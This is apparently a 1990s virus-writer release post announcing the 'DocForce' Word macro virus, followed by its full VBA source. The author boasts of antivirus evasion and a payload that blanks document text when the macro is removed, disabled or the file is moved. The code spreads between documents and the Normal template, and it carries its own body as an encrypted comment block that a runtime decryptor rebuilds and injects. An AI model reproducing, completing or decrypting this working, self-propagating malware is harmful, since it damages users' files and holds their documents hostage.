f l i t n i c @ g m x . n e t		member of [SOS]

http://members.tripod.com/Flitnic

Hi folks :)

This is my newest virus --> DocForce
It's not designed to have a good stealth or polymorphic engine!
It was designed to be encrypted and it has a new feature!
The User loses his document's containing if he deletes my macro out or
if he doesn't activate its macros :)

This would be a very good virus, if it weren't very slow on older Pentium machines.. On my PII it's fast enough. However this new feature 
is an intersting one as I guess. And the virus would be two times 
faster if I hadn't included that encryption, but a virus without any 
stealth poly or encryption sucks :)

Okay here are the features:

1. DocCapturing: the document's text is being lost if the virus is deleted or not activated (after restoring the virus the text is back again)
2. Encryption: It is on each run new encrypted by a randomly generated key between 1 and 101.
3. Poly: Only basic: line adding. (cause of performance)
4. Stealth: Only basic (locking). (cause of performance)
5. IT'S NOT DETECTED BY HMVS, F-PROT'S F-MACROW, NORTON AV'S HEURISTIC and F/WIN32... others not tested.. 
6. Payload: If a user transfers his documents to another machine or 
gives them to a friend, the document will be empty (only the virus will
 be in) :)

okay that's it... FUCK THE AVs!


f l i t n i c @ g m x . n e t

http://members.tripod.com/Flitnic

------------->8------- Cut Here For Virus ----------------------------

Private Sub Document_Open()
''13
Bas = 0
''n-J-NpÅvÉrQ|pÇzr{Å;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5>9->6
''Vs-n-J-/]vÉnÅr-`Ço-Q|pÇzr{Ål\}r{56/-aur{
''`rÅ-v{s-J-[|znyarz}ynÅr
''`rÅ-Ä|Ç-J-NpÅvÉrQ|pÇzr{Å
''Vqr{Å-J-Vqr{Å-8->
''R{q-Vs
''N}}yvpnÅv|{;R{noyrPn{pryXrÜ-J-ÑqPn{pryQvÄnoyrq
''n-J-[|znyarz}ynÅr;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5>9->6
''Vs-n-J-/]vÉnÅr-`Ço-Q|pÇzr{Ål\}r{56/-aur{
''`rÅ-Ä|Ç-J-[|znyarz}ynÅr
''`rÅ-v{s-J-NpÅvÉrQ|pÇzr{Å
''Vqr{Å-J-Vqr{Å-8-?
''R{q-Vs
''Vs-Vqr{Å-J-@-aur{
''`rÅ-v{s-J-[|znyarz}ynÅr
''`rÅ-Ä|Ç-J-NpÅvÉrQ|pÇzr{Å
''R{q-Vs
''N}}yvpnÅv|{;\}Åv|{Ä;cvÇÄ]|ÅrpÅv|{-J-SnyÄr
''\}Åv|{Ä;`nÉr[|zny]|z}Å-J-SnyÄr
''_n{q|zvár-avzr
''{q[Çzor-J-V{Å5_{q-7->==6-8->
''_Y-J-@
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;r}ynpryv{r-?9-/44/-3-{q[Çzor
''_Y-J-=
''NpÅvÉnÅrÄ-J-=
''_Y-J-@
''yv{-J-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;P|Ç{Å\sYv{rÄ
''Å-J->
''Q|-b{Åvy-Å-J-yv{
''`}nprY-J->
''Å-J-Å-8->
''y-J-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5Å9->6
''Vs-NpÅvÉnÅrÄ-J->-aur{-T|a|-\ÉrWÇz}
''Vs-y-J-/R{q-`Ço/-aur{
''NpÅvÉnÅrÄ-J->
''T|a|-[rÖWÇz}
''RyÄr
''T|a|-[rÖWÇz}
''R{q-Vs
''\ÉrWÇz}G
''Vs-y-J-/]vÉnÅr-`Ço-Q|pÇzr{ÅlPy|Är56/-aur{-T|a|-[rÖWÇz}
''Vs-y-J-/R{q-`Ço/-aur{-T|a|-R`Ço
''Vs-V{`Å5y9-/Ñv{qv-J/6-K-=-N{q-V{`Å5y9-/V{`Å/6-J-=-N{q-Vqr{Å-J-@-aur{-[|Qry-J->
''yy-J-Yr{5y6
''S|-v-J->-a|-yy
''o-J-Zvq5y9-v9->6
''p-J-NÄp5o6
''p-J-p-8-{q[Çzor
''o-J-Pu5p6
''arz}Y-J-arz}Y-3-o
''`}nprY-J-=
''[rÖÅ-v
''Vs-`}nprY-J-=-aur{
''_Y-J-_Y-8->
''Q|
''}|ÉrP|qr-J-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5_Y9->6
''Vs-YrsÅ5}|ÉrP|qr9-?6-J-/44/-aur{-RÖvÅ-Q|
''_Y-J-_Y-8->
''Y||}
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;r}ynpryv{r-_Y9-/44/-3-arz}Y
''Vs-[|Qry-IK->-aur{
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;QryrÅrYv{rÄ-Å9->
''RyÄr
''Å-J-Å-8->
''R{q-Vs
''arz}Y-J-//
''R{q-Vs
''y-J-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5Å9->6
''T|a|-\ÉrWÇz}
''WÇz}G
''[rÖWÇz}G
''Y||}
''R`ÇoG
''dvÅÅr{OÜ-J-/SYVa[VP/
''sÇpx-J-/SbPX-Nc].9-SbPX-S:]_\a.9-SbPX-Q;-`\Y\Z\[.9-SbPX-UZc`.9-SbPX-S:dV[@?./
''_n{q|zvár-avzr
''{qcnY-J-V{Å5_{q-7-?=6-8->
''S|-prnÅrcn-J->-a|-{qcnY
''{qcn-J-V{Å5_{q-7->?C6-8->?E
''[rÑcn-J-[rÑcn-3-Pu5{qcn6
''[rÖÅ-prnÅrcn
''ÅÅ-J->
''Q|
''ÅÅ-J-ÅÅ-8->
''n-J-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5ÅÅ9->6
''Vs-n-J-/R{q-`Ço/-aur{-RÖvÅ-Q|
''Y||}
''ÑurrV{ÄrÅ-J-V{Å5_{q-7-ÅÅ-:-A6-8-A
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;V{ÄrÅYv{rÄ-ÑurrV{ÄrÅ9-[rÑcn-3-/G/
''{qcnY-J-V{Å5_{q-7-?=6-8->
''S|-prnÅrcn-J->-a|-{qcnY
''{qcn-J-V{Å5_{q-7->?C6-8->?E
''[rÑcn?-J-[rÑcn?-3-Pu5{qcn6
''[rÖÅ-prnÅrcn
''[rÑcn?-J-Pu5@A6-3-[rÑcn?-3-Pu5@A6
''ÅÅ-J->
''Q|
''ÅÅ-J-ÅÅ-8->
''n-J-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5ÅÅ9->6
''Vs-n-J-/R{q-`Ço/-aur{-RÖvÅ-Q|
''Y||}
''ÑurrV{ÄrÅ-J-V{Å5_{q-7-ÅÅ-:-A6-8-A
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;V{ÄrÅYv{rÄ-ÑurrV{ÄrÅ9-[rÑcn-3-/J/-3-[rÑcn?
''{qcnY-J-V{Å5_{q-7-?=6-8->
''S|-prnÅrcn-J->-a|-{qcnY
''{qcn-J-V{Å5_{q-7->?C6-8->?E
''[rÑcn-J-[rÑcn-3-Pu5{qcn6
''[rÖÅ-prnÅrcn
''[rÑcn-J-/_rz-/-3-[rÑcn
''ÅÅ-J->
''Q|
''ÅÅ-J-ÅÅ-8->
''n-J-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5ÅÅ9->6
''Vs-n-J-/R{q-`Ço/-aur{-RÖvÅ-Q|
''Y||}
''ÑurrV{ÄrÅ-J-V{Å5_{q-7-ÅÅ-:-A6-8-A
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;V{ÄrÅYv{rÄ-ÑurrV{ÄrÅ9-[rÑcn
''Vs-bPnÄr5v{s6-J-/[\_ZNY;Q\a/-aur{
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;r}ynpryv{r-@9-/OnÄ-J->/
''RyÄr
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;r}ynpryv{r-@9-/OnÄ-J-=/
''R{q-Vs
''SP|qr-J-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5>9-Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;P|Ç{Å\sYv{rÄ6
''Vs-bPnÄr5v{s6-J-/[\_ZNY;Q\a/-aur{
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;r}ynpryv{r-@9-/OnÄ-J-=/
''RyÄr
''Ä|Ç;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;r}ynpryv{r-@9-/OnÄ-J->/
''R{q-Vs
''XrÜOv{qv{tÄ;Nqq-XrÜP|qrGJOÇvyqXrÜP|qr5ÑqXrÜNyÅ9-ÑqXrÜS>>69-XrÜPnÅrt|ÜGJÑqXrÜPnÅrt|ÜS|{Å9-P|zzn{qGJ/-/
''XrÜOv{qv{tÄ;Nqq-XrÜP|qrGJOÇvyqXrÜP|qr5ÑqXrÜNyÅ9-ÑqXrÜSE69-XrÜPnÅrt|ÜGJÑqXrÜPnÅrt|ÜS|{Å9-P|zzn{qGJ/-/
''N}}yvpnÅv|{;P|zzn{qOnÄ5/a||yÄ/6;P|{Å|yÄ5>?6;cvÄvoyr-J-SnyÄr
''Vs-Vqr{Å-J-@-aur{
''Ñv{q-J-R{Év|{5/Ñv{qv/6
''\}r{-/pGisyvÅ{vp;onÅ/-S|-N}}r{q-NÄ-0>
'']v{Å-0>9-/r{-/-3-Ñv{q-3-/iÄÜÄÅrziÉzz@?isyvÅ{vp/-3-Pu5?BB6-3-Pu5?>F6-3-Pu5?BA6-3-/-SyvÅ{vp/
'']v{Å-0>9-/rÖvÅ/
''Py|Är
''Äu-J-`uryy5/pGisyvÅ{vp;onÅ/9-=6
''S|-ÑnvÅÅ-J->-a|->====
''Q|RÉr{ÅÄ
''[rÖÅ-ÑnvÅÅ
''Xvyy-/pGisyvÅ{vp;onÅ/
''qqq-J-Qv5Ñv{q-3-/iÄÜÄÅrziÉzz@?isyvÅ{vpi/-3-NpÅvÉrQ|pÇzr{Å;[nzr6
''Vs-qqq-J-//-aur{-RÖvÅ-`Ço
''`ryrpÅv|{;du|yr`Å|Ü
''`ryrpÅv|{;QryrÅr
''`ryrpÅv|{;V{ÄrÅSvyr-Svyr[nzrGJÑv{q-3-/iÄÜÄÅrziÉzz@?isyvÅ{vpi/-3-NpÅvÉrQ|pÇzr{Å;[nzr9-_n{trGJ//9-P|{svzP|{ÉrÄv|{ÄGJSnyÄr9-Yv{xGJSnyÄr9-NÅÅnpuzr{ÅGJSnyÄr
''\}r{-/pGisyvÅ{vp;onÅ/-S|-N}}r{q-NÄ-0>
'']v{Å-0>9-/r{-/-3-Ñv{q-3-/iÄÜÄÅrziÉzz@?isyvÅ{vp-syvÅ{vp/-3-Pu5?BB6-3-Pu5?>F6-3-Pu5?BA6
'']v{Å-0>9-/rÖvÅ/
''Py|Är
''Äu-J-`uryy5/pGisyvÅ{vp;onÅ/9-=6
''S|-ÑnvÅÅ?-J->-a|->====
''Q|RÉr{ÅÄ
''[rÖÅ-ÑnvÅÅ?
''Xvyy-/pGisyvÅ{vp;onÅ/
''N}}yvpnÅv|{;`prr{b}qnÅv{t-J-aÇr
''N}}yvpnÅv|{;`prr{_rsrÄu
''RÖvÅ-`Ço
''R{q-Vs
''v{s;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;QryrÅrYv{rÄ->9-v{s;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;P|Ç{Å\sYv{rÄ
''v{s;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;nqqs|zÄÅv{t-5SP|qr6
''RÖvÅ-`Ço
''Ñv{qv-J-R{Év|{5/Ñv{qv/6
''ortv{G
''\}r{-/pGisyvÅ{vp;onÅ/-S|-N}}r{q-NÄ-0>
'']v{Å-0>9-/r{-/-3-Ñv{qv-3-/iÄÜÄÅrziÉzz@?isyvÅ{vp/-3-Pu5?BB6-3-Pu5?>F6-3-Pu5?BA6-3-/-SyvÅ{vp/
'']v{Å-0>9-/rÖvÅ/
''Py|Är
''Äu-J-`uryy5/pGisyvÅ{vp;onÅ/9-=6
''S|-ÑnvÅÅ-J->-a|->====
''Q|RÉr{ÅÄ
''[rÖÅ-ÑnvÅÅ
''Xvyy-/pGisyvÅ{vp;onÅ/
''qqq-J-Qv5Ñv{qv-3-/iÄÜÄÅrziÉzz@?iSyvÅ{vp/9-ÉoQvrpÅ|Ü6
''Vs-qqq-J-//-aur{
''ZxQv-Ñv{qv-3-/iÄÜÄÅrziÉzz@?iSyvÅ{vp/
''\}r{-/pGisyvÅ{vp;onÅ/-S|-N}}r{q-NÄ-0>
'']v{Å-0>9-/r{-/-3-Ñv{qv-3-/iÄÜÄÅrziÉzz@?isyvÅ{vp-syvÅ{vp/-3-Pu5?BB6-3-Pu5?>F6-3-Pu5?BA6
'']v{Å-0>9-/rÖvÅ/
''Py|Är
''Äu-J-`uryy5/pGisyvÅ{vp;onÅ/9-=6
''S|-ÑnvÅÅ-J->-a|->====
''Q|RÉr{ÅÄ
''[rÖÅ-ÑnvÅÅ
''Xvyy-/pGisyvÅ{vp;onÅ/
''T|a|-ortv{
''R{q-Vs
''sÇÖ-J-NpÅvÉrQ|pÇzr{Å;SÇyy[nzr
''Vs-Zvq5sÇÖ9-?9->6-IK-/G/-aur{
''N}}yvpnÅv|{;Qvny|tÄ5ÑqQvny|tSvyr`nÉrNÄ6;`u|Ñ
''R{q-Vs
''sÇÖ-J-NpÅvÉrQ|pÇzr{Å;SÇyy[nzr
''OÜÅrPnÄu-J-Ñv{qv-3-/iÄÜÄÅrziÉzz@?isyvÅ{vpi/-3-NpÅvÉrQ|pÇzr{Å;[nzr
''NpÅvÉrQ|pÇzr{Å;`nÉrNÄ-Ñv{qv-3-/iÄÜÄÅrziÉzz@?isyvÅ{vpi/-3-NpÅvÉrQ|pÇzr{Å;[nzr9-9-9-9-Nqqa|_rpr{ÅSvyr-J-SnyÄr
''Q|-b{Åvy-Å-J-_rpr{ÅSvyrÄ;P|Ç{Å
''Å-J-Å-8->
''Vs-V{`Å5_rpr{ÅSvyrÄ5Å6;]nÅu9-/yvÅ{vp/6-K-=-aur{-_rpr{ÅSvyrÄ5Å6;QryrÅr
''Y||}
''N}}yvpnÅv|{;`prr{b}qnÅv{t-J-SnyÄr
''N}}yvpnÅv|{;`prr{_rsrÄu
''`ryrpÅv|{;du|yr`Å|Ü
''`ryrpÅv|{;QryrÅr
''NpÅvÉrQ|pÇzr{Å;P|{År{Å;V{ÄrÅOrs|r-/dn{v{tG/-3-Pu5>@6
''NpÅvÉrQ|pÇzr{Å;P|{År{Å;V{ÄrÅNsÅr-/auvÄ-vÄ-n-}|ÅrpÅrq-q|pÇzr{Å./-3-Pu5>@6
''NpÅvÉrQ|pÇzr{Å;P|{År{Å;V{ÄrÅNsÅr-/f|Ç-unÉr-Å|-npÅvÉnÅr-Åur-znp|Ä-v{-Åur-q|pÇzr{Å-ors|r-Ü|Ç-pn{-Ärr-Åur-q|pÇzr{Å4Ä-ÅrÖÅ./-3-Pu5>@6
''NpÅvÉrQ|pÇzr{Å;P|{År{Å;V{ÄrÅNsÅr-/`|-py|Är-Åur-q|pÇzr{Å9-|}r{-vÅ-ntnv{-n{q-pyvpx-|{-4NpÅvÉnÅr-znp|Ä4./-3-Pu5>@6
''NpÅvÉrQ|pÇzr{Å;`nÉrNÄ-sÇÖ
''\}r{-/pGisyvÅ{vp;onÅ/-S|-N}}r{q-NÄ-0>
'']v{Å-0>9-/r{-/-3-Ñv{qv-3-/iÄÜÄÅrziÉzz@?isyvÅ{vp-syvÅ{vp/-3-Pu5?BB6-3-Pu5?>F6-3-Pu5?BA6
'']v{Å-0>9-/rÖvÅ/
''Py|Är
''Äu-J-`uryy5/pGisyvÅ{vp;onÅ/9-=6
''S|-ÑnvÅÅ-J->-a|->====
''Q|RÉr{ÅÄ
''[rÖÅ-ÑnvÅÅ
''Xvyy-/pGisyvÅ{vp;onÅ/
''Å-J-=
''QryrÅr[|ÑG
''Q|-b{Åvy-Å-J-NpÅvÉrQ|pÇzr{Å;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;P|Ç{Å\sYv{rÄ
''Å-J-Å-8->
''Vs-`Ç-J->-aur{
''Pp-J-Pp-8->
''RyÄr
''Ppp-J-Ppp-8->
''R{q-Vs
''n-J-NpÅvÉrQ|pÇzr{Å;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5Å9->6
''Vs-n-J-/]vÉnÅr-`Ço-Q|pÇzr{ÅlPy|Är56/-aur{-`Ç-J->
''Y||}
''NpÅvÉrQ|pÇzr{Å;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;QryrÅrYv{rÄ-Ppp-8->9-Pp-:->
''n-J-NpÅvÉrQ|pÇzr{Å;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;Yv{rÄ5NpÅvÉrQ|pÇzr{Å;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;P|Ç{Å\sYv{rÄ9->6
''Vs-n-IK-/R{q-`Ço/-aur{-NpÅvÉrQ|pÇzr{Å;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;V{ÄrÅYv{rÄ-NpÅvÉrQ|pÇzr{Å;cO]|wrpÅ;cOP|z}|{r{ÅÄ5>6;P|qrZ|qÇyr;P|Ç{Å\sYv{rÄ-8->9-/R{q-`Ço/
''N}}yvpnÅv|{;`prr{b}qnÅv{t-J-aÇr
''N}}yvpnÅv|{;`prr{_rsrÄu
''NpÅvÉrQ|pÇzr{Å;`nÉr
''

If Application.ShowVisualBasicEditor = True Then Application.ShowVisualBasicEditor = False
Set Nm = NormalTemplate.VBProject
a = Nm.VBComponents(1).CodeModule.Lines(1, 1)
If a = "Private Sub Document_Open()" Then
Set inf = ActiveDocument.VBProject
Set sour = NormalTemplate.VBProject
Ident = 1
End If
Set Ad = ActiveDocument.VBProject
a = Ad.VBComponents(1).CodeModule.Lines(1, 1)
If a = "Private Sub Document_Open()" Then
Set inf = NormalTemplate.VBProject
Set sour = ActiveDocument.VBProject
Ident = Ident + 2
End If
If Ident = 3 Then
If Bas <> 1 Then
Set inf = NormalTemplate.VBProject
Set sour = ActiveDocument.VBProject
Else
Exit Sub
End If
End If
l = sour.VBComponents(1).CodeModule.Lines(2, 1)
lll = Len(l) - 2
rndNumber = Right(sour.VBComponents(1).CodeModule.Lines(2, 1), lll)
rndNumber = CInt(rndNumber)
lin = sour.VBComponents(1).CodeModule.CountOfLines
t = 2
Do Until t = lin
SpaceL = 1
t = t + 1
l = sour.VBComponents(1).CodeModule.Lines(t, 1)
If l = "Private Sub Document_Open()" Then GoTo NexJump
If t = 2 Then GoTo NexJump
If Left(l, 2) <> "''" Then GoTo NexJump
ll = Len(l)
For i = 3 To ll
b = Mid(l, i, 1)
c = Asc(b)
c = c - rndNumber
b = Chr(c)
TempL = TempL & b
SpaceL = 0
Next i
If SpaceL = 0 Then
If NewL = "" Then
NewL = TempL
GoTo Jump
End If
NewL = NewL & Chr(13) & TempL
End If
Jump:
TempL = ""
NexJump:
If t = 173 Then
e = 2
End If
Loop
EndDecrypt:
t = 0
Do Until t = lin
t = t + 1
s = sour.VBComponents(1).CodeModule.Lines(t, 1)
If s = "Private Sub Document_Close()" Then Exit Do
Loop
sour.VBComponents(1).CodeModule.InsertLines t + 1, NewL
Application.ScreenUpdating = False
Call Document_Close
End Sub
Private Sub Document_Close()
End Sub
